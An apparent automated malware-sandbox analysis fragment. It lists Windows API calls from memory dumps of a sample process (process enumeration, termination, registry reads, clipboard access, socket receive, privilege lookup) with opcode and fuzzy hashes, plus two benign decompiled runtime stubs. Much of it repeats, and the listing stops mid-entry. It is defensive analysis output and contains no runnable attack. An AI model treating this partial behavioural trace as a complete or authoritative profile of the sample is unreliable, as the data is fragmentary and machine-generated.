                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BACAA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: EnumModulesProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1082081703-0
                                                                                                              • Opcode ID: cbf8cdab1faa9c19cc4582895fd89b74d66d9cecd51cdc1f3d7df91de9649783
                                                                                                              • Instruction ID: 5f6f3311a479bf219f2d97a03c18fc6946d2d333036fecb57df0c7533c6ad598
                                                                                                              • Opcode Fuzzy Hash: cbf8cdab1faa9c19cc4582895fd89b74d66d9cecd51cdc1f3d7df91de9649783
                                                                                                              • Instruction Fuzzy Hash: 6121E6B2109380AFE7128F64DC45B96BFB8EF06320F08849AE984DB193D324D949C761
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BAD9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 3425974696-0
                                                                                                              • Opcode ID: 32bfee702a87e36135a323d38e4872cebce2781f6b9f1e4daa41d15ac5425ec0
                                                                                                              • Instruction ID: 3d70f59fcf7336ad87d8727db27a89a784efa40265f0b4afa96a2c1c7ba97fc2
                                                                                                              • Opcode Fuzzy Hash: 32bfee702a87e36135a323d38e4872cebce2781f6b9f1e4daa41d15ac5425ec0
                                                                                                              • Instruction Fuzzy Hash: 7721A8715093846FE722CF55DC44F96BFB8DF06210F0884AAE944DB152D764E948CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • TerminateProcess.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BBAB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ProcessTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 560597551-0
                                                                                                              • Opcode ID: 7563eefea3b5add0b9ccc6ed532c120a817fecf64468da0776993737e4e41613
                                                                                                              • Instruction ID: 5f25e191d7ed73d1e3d48ebff4b117d2b25cfa01126536854d6622eab18cf2d9
                                                                                                              • Opcode Fuzzy Hash: 7563eefea3b5add0b9ccc6ed532c120a817fecf64468da0776993737e4e41613
                                                                                                              • Instruction Fuzzy Hash: 5F2195B15493846FE7138F25DC45F96BFB8EF46320F0884EBE984DF292D264A948C761
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,?,?), ref: 026BBE12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: b714c62d550b709956881297d16bcc2794567cb6f2c355bde949b2a378d4eded
                                                                                                              • Instruction ID: 98b62e23b3d1919732153004dd3245ad0783ed1d3d6ec1b5cc4bdae135b77c46
                                                                                                              • Opcode Fuzzy Hash: b714c62d550b709956881297d16bcc2794567cb6f2c355bde949b2a378d4eded
                                                                                                              • Instruction Fuzzy Hash: 0B21D7755093C06FD3138B25DC51F62BFB4EF87A20F0981DBE9848B653D225A91AC7B2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindNextFileW.KERNEL32(?,00000E38,?,?), ref: 026BA23E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileFindNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2029273394-0
                                                                                                              • Opcode ID: bcc50c912664d2f8b8a87c57083aaf69b180e3223b3d91415e43942ca9ff1f7f
                                                                                                              • Instruction ID: 0fe528c0a33a373aa05214d554366698ae3013bb264e2e064bfcbf7f982f9cbc
                                                                                                              • Opcode Fuzzy Hash: bcc50c912664d2f8b8a87c57083aaf69b180e3223b3d91415e43942ca9ff1f7f
                                                                                                              • Instruction Fuzzy Hash: F821F27140D3C06FD3138B268C55B66BFB4EF47620F0981DBE984CF293D224A909C7A2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E38), ref: 026BB6CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: 3537e68a320885add5c1543b189a00de84cebe04698709d8c790eb3dbcf793eb
                                                                                                              • Instruction ID: a58788b6475367859cba2afd444ada36c5e957a0dd4809697b4c37ecae583973
                                                                                                              • Opcode Fuzzy Hash: 3537e68a320885add5c1543b189a00de84cebe04698709d8c790eb3dbcf793eb
                                                                                                              • Instruction Fuzzy Hash: 6D21D1B2500704AFE7229F65DC85FAAFBECEF08324F14846AED419B641E724E549CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BB7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: 628c529b3011de480064c96319a2faca1e1e501ee7dca7cb0ae96c105a2f7bdf
                                                                                                              • Instruction ID: 4054287b83cdbd0b8167e13f4dba596c33bf9bd1954b174c33470d41486c3aca
                                                                                                              • Opcode Fuzzy Hash: 628c529b3011de480064c96319a2faca1e1e501ee7dca7cb0ae96c105a2f7bdf
                                                                                                              • Instruction Fuzzy Hash: 7D219071600704AFE722CF16CC84FA6BBECEF04724F08846AED459B652D764E444CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BAADC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: ac6b79f45ff7ffe60f696e8ac0492ba1fb993610cee825c34a793cbe48131c91
                                                                                                              • Instruction ID: e6eccb0e1daf442278d5cb864d6db87774010103fbf8f7060777bda393b960f0
                                                                                                              • Opcode Fuzzy Hash: ac6b79f45ff7ffe60f696e8ac0492ba1fb993610cee825c34a793cbe48131c91
                                                                                                              • Instruction Fuzzy Hash: D32181725093C05FDB138B25DD54792BFB4AF07224F0D84DAED858F663D2649948CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?,00000E38), ref: 026BAF67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: 35beb5bd6a790246984128b05cde3b68f993cff315c75696aa78b398bbb4d8bc
                                                                                                              • Instruction ID: 764e6a3ede04eca1874eee211e98ea7df395e2c81a61cd373540f146c6be59e6
                                                                                                              • Opcode Fuzzy Hash: 35beb5bd6a790246984128b05cde3b68f993cff315c75696aa78b398bbb4d8bc
                                                                                                              • Instruction Fuzzy Hash: DE21D271508380AFE722CF15DD85FA6BFA8EF05320F18849AF9445B292D364E948C762
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BAD9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 3425974696-0
                                                                                                              • Opcode ID: d0e947e5ca34c5c510234bc798c7d16fc81299f80aa48bfe511283a69ee67c24
                                                                                                              • Instruction ID: 29f95285c0140990ed6a5dbce19e0c3962b7676e86158872bece10730ca77491
                                                                                                              • Opcode Fuzzy Hash: d0e947e5ca34c5c510234bc798c7d16fc81299f80aa48bfe511283a69ee67c24
                                                                                                              • Instruction Fuzzy Hash: 1311B4716003049FEB22CF55DC44FA6BBA8EF04320F04846AED45CB291D774E844CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • MkParseDisplayName.OLE32(?,00000E38,?,?), ref: 026BB8C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DisplayNameParse
                                                                                                              • String ID:
                                                                                                              • API String ID: 3580041360-0
                                                                                                              • Opcode ID: 7d22e257cb8e03dc58b186a334c14e5e77fd09e407998c849ae2bfca8f324645
                                                                                                              • Instruction ID: 551b838061267625203926301ca6409f05a4994c676a071564445efcdc4da280
                                                                                                              • Opcode Fuzzy Hash: 7d22e257cb8e03dc58b186a334c14e5e77fd09e407998c849ae2bfca8f324645
                                                                                                              • Instruction Fuzzy Hash: 7D21E7725093C06FC312CB26CC45F62BFB4EF87610F0981CBE9848B253D220E915C7A2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 026BA806
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3899507212-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BACAA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: EnumModulesProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1082081703-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • TerminateProcess.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BBAB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ProcessTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 560597551-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026BB5CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA6B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • OleGetClipboard.OLE32(?,00000E38,?,?), ref: 026BBF8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 220874293-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 1507349165-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?,00000E38), ref: 026BAF67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E38,?,?), ref: 026BAEA6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 514040917-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FormatMessageW.KERNEL32(?,00000E38,?,?), ref: 026BBBBE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FormatMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 1306739567-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 026BA806
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3899507212-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA620
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindNextFileW.KERNEL32(?,00000E38,?,?), ref: 026BA23E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileFindNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2029273394-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FormatMessageW.KERNEL32(?,00000E38,?,?), ref: 026BBBBE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FormatMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 1306739567-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E38,?,?), ref: 026BAEA6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 514040917-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026BB5CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: c8f4df5384636e77c9e3e79fdba0b64446f5fc76ac1a16b2951e888a3b48e04a
                                                                                                              • Instruction ID: a88269f5937fd3b2803540cdb4a1b38341d1755002c4cd2437980741057c5319
                                                                                                              • Opcode Fuzzy Hash: c8f4df5384636e77c9e3e79fdba0b64446f5fc76ac1a16b2951e888a3b48e04a
                                                                                                              • Instruction Fuzzy Hash: 52018032400700DFDB228F56D984B66FFE0EF08320F0888AAED494B615D375E454CF62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • MkParseDisplayName.OLE32(?,00000E38,?,?), ref: 026BB8C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DisplayNameParse
                                                                                                              • String ID:
                                                                                                              • API String ID: 3580041360-0
                                                                                                              • Opcode ID: c1d43533aea50ecd333822d47decb9250081ce04e5c1a977e98e52698a0d5bc7
                                                                                                              • Instruction ID: 250eba546bbeb3798bcd46d2a00c097df738daa4cc39119d08d4f7555bfd05f4
                                                                                                              • Opcode Fuzzy Hash: c1d43533aea50ecd333822d47decb9250081ce04e5c1a977e98e52698a0d5bc7
                                                                                                              • Instruction Fuzzy Hash: 6101A271500601ABD254DF1ADC86B22FBB4FB89B20F14811AED085B741E231F516CBE5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,?,?), ref: 026BBE12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: d1e7dc196fabb025af65ed500120fb01f6f6abf54031a806f366886124520d71
                                                                                                              • Instruction ID: 2c4bd9a168dacd52a2d182d62c439f6c5bbd5e9df00105bdd3c48c895c209ab9
                                                                                                              • Opcode Fuzzy Hash: d1e7dc196fabb025af65ed500120fb01f6f6abf54031a806f366886124520d71
                                                                                                              • Instruction Fuzzy Hash: 9101A271500605ABD214DF1ADC86B22FBB4FB89B20F14811AED085B741E371F516CAE5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BAADC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: 97a5f1d5ef6e6bf7560efd77ceecee5c72eba8b5f12e270c62a8b1b863392ffd
                                                                                                              • Instruction ID: 5a96ddddd5c851df6581e8e85d53ccf0ef8d92745b6293c19c3c5dbb3a50f9db
                                                                                                              • Opcode Fuzzy Hash: 97a5f1d5ef6e6bf7560efd77ceecee5c72eba8b5f12e270c62a8b1b863392ffd
                                                                                                              • Instruction Fuzzy Hash: 2601DF716003408FDB51CF5AD9847A2FBA4EF04220F08C0AADD498F746E374E888CB72
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • OleGetClipboard.OLE32(?,00000E38,?,?), ref: 026BBF8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 220874293-0
                                                                                                              • Opcode ID: 7ea18f6faeb63c6c80d016f2cca6fa09dde27699728ab8ae926e5c1bf11e4897
                                                                                                              • Instruction ID: ddc79ca3506611cfa27d81cf572e37fb7c774467006c8769d24f3ecb369855c4
                                                                                                              • Opcode Fuzzy Hash: 7ea18f6faeb63c6c80d016f2cca6fa09dde27699728ab8ae926e5c1bf11e4897
                                                                                                              • Instruction Fuzzy Hash: 8301AD71500601ABD224DF1ADC86B22FBB8FB89B20F14815AED085B741E231F916CAE6
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA6B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: a55144c1d6974e8eb66571e015705342f669c03a6ce04ae78ab4a136b1c8e0f5
                                                                                                              • Instruction ID: 4a8ff84d6408b1b5bd3f34fc55a6e72213600cd4a906c25910e73b5024173fe9
                                                                                                              • Opcode Fuzzy Hash: a55144c1d6974e8eb66571e015705342f669c03a6ce04ae78ab4a136b1c8e0f5
                                                                                                              • Instruction Fuzzy Hash: 5D0184715043409FDB518F6AD884795FFA4DF04220F18C4AADD498F755E779D844CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: closesocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 2781271927-0
                                                                                                              • Opcode ID: 3cf2324bca9d5bef28e3d455e178430cf438637061d271c1110d5b985eec407c
                                                                                                              • Instruction ID: ccdf4a3b937eefa227942371f4df6d20573f01b12e60dfd870f2a9620ff7172d
                                                                                                              • Opcode Fuzzy Hash: 3cf2324bca9d5bef28e3d455e178430cf438637061d271c1110d5b985eec407c
                                                                                                              • Instruction Fuzzy Hash: 04018B719043409FDB61CF1AD8887A6FBA0EF04224F0884AADD488F646E379A444CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA620
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 28c066374ec1d553a14d4458bca4bf7b866af836242a303792545ec4bcc6928a
                                                                                                              • Instruction ID: b3f0e012d89e1cad7599cc652e03d617170f04f5d74652a97602f13b9e9a2977
                                                                                                              • Opcode Fuzzy Hash: 28c066374ec1d553a14d4458bca4bf7b866af836242a303792545ec4bcc6928a
                                                                                                              • Instruction Fuzzy Hash: 9AF0AF759043409FDB218F56D8887A1FFA0EF04320F18C0AADD494B756E779E988CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0040D4F4(intOrPtr _a4) {
                                                                                                              				void* _t6;
                                                                                                              
                                                                                                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                              				 *0x4234b4 = _t6;
                                                                                                              				if(_t6 != 0) {
                                                                                                              					 *0x4250b0 = 1;
                                                                                                              					return 1;
                                                                                                              				} else {
                                                                                                              					return _t6;
                                                                                                              				}
                                                                                                              			}





                                                                                                              APIs
                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D509
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: CreateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 10892065-0
                                                                                                              • Opcode ID: b74f0eb7cb2547a527357118f2996512e6bc5046d847e9bf487a9ebd00f7de6a
                                                                                                              • Instruction ID: 0dc2e37081550a42f18de716efddd1270264307755b804b1511d5f7ef129bf73
                                                                                                              • Opcode Fuzzy Hash: b74f0eb7cb2547a527357118f2996512e6bc5046d847e9bf487a9ebd00f7de6a
                                                                                                              • Instruction Fuzzy Hash: 81D05E36A54344AADB115FB07C08B663BDCE388399F404476B90DC6290E678C6418548
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E004104A0() {
                                                                                                              				void* _t1;
                                                                                                              
                                                                                                              				_t1 = E0041042E(0); // executed
                                                                                                              				return _t1;
                                                                                                              			}




                                                                                                              0x004104a2
                                                                                                              0x004104a8

                                                                                                              APIs
                                                                                                              • __encode_pointer.LIBCMT ref: 004104A2
                                                                                                                • Part of subcall function 0041042E: TlsGetValue.KERNEL32(00000000,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410440
                                                                                                                • Part of subcall function 0041042E: TlsGetValue.KERNEL32(00000005,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410457
                                                                                                                • Part of subcall function 0041042E: RtlEncodePointer.NTDLL(00000000,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410495
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: Value$EncodePointer__encode_pointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2585649348-0
                                                                                                              • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                              • Instruction ID: 0ab7d73962414d5186b489697112e47586215f96ab6b5d6f5a678242159ddd99
                                                                                                              • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b4346efb4c691672479a535c9acdb57551ea6cacdb850e35f8bfa0ebc6414a8
                                                                                                              • Instruction ID: 3023a1f12e995ecda301625a1812798cb85f91bc948a628690d93f3ef806db61
